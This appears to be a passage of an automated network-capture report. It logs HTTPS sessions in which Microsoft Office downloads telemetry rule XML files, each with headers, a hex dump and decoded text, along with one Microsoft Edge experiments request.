                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                12192.168.2.54974313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:20 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 450
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210220Z-16849878b78j7llf5vkyvvcehs00000006pg00000000atu5
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                13192.168.2.54974513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:20 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 11ae3112-301e-005d-596b-27e448000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210220Z-16849878b78g2m84h2v9sta29000000004hg000000004pgk
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:20 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                14192.168.2.54974613.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:21 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 32193d61-901e-0015-09ca-27b284000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210222Z-17c5cb586f6g6g2sa7kg5c0gg000000000t000000000k9e8
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                15192.168.2.54974913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:21 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4755be7f-e01e-0052-062b-26d9df000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210222Z-16849878b78tg5n42kspfr0x4800000005eg00000000xes0
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                16192.168.2.54974713.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: e5fe76b8-601e-0050-2e06-262c9c000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210222Z-17c5cb586f6fqqst87nqkbsx1c000000042g0000000017s8
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                17192.168.2.54975113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 467
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: e84b733d-701e-005c-1bb8-26bb94000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210222Z-16849878b78bcpfn2qf7sm6hsn000000073000000000sxec
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                18192.168.2.54975013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 632
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210222Z-16849878b78km6fmmkbenhx76n00000004v000000000pr3p
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:22 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                19192.168.2.54975494.245.104.564436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                Set-Cookie: ARRAffinity=b65d9106bc81838a23d8a3edd144c8dcf94d11cfa7af5eb97996169fda12e5cf;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                                Set-Cookie: ARRAffinitySameSite=b65d9106bc81838a23d8a3edd144c8dcf94d11cfa7af5eb97996169fda12e5cf;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                                Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                20192.168.2.54976013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: cb18986a-b01e-0053-40f0-27cdf8000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210223Z-r197bdfb6b4wmcgqdschtyp7yg00000005hg00000000671n
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
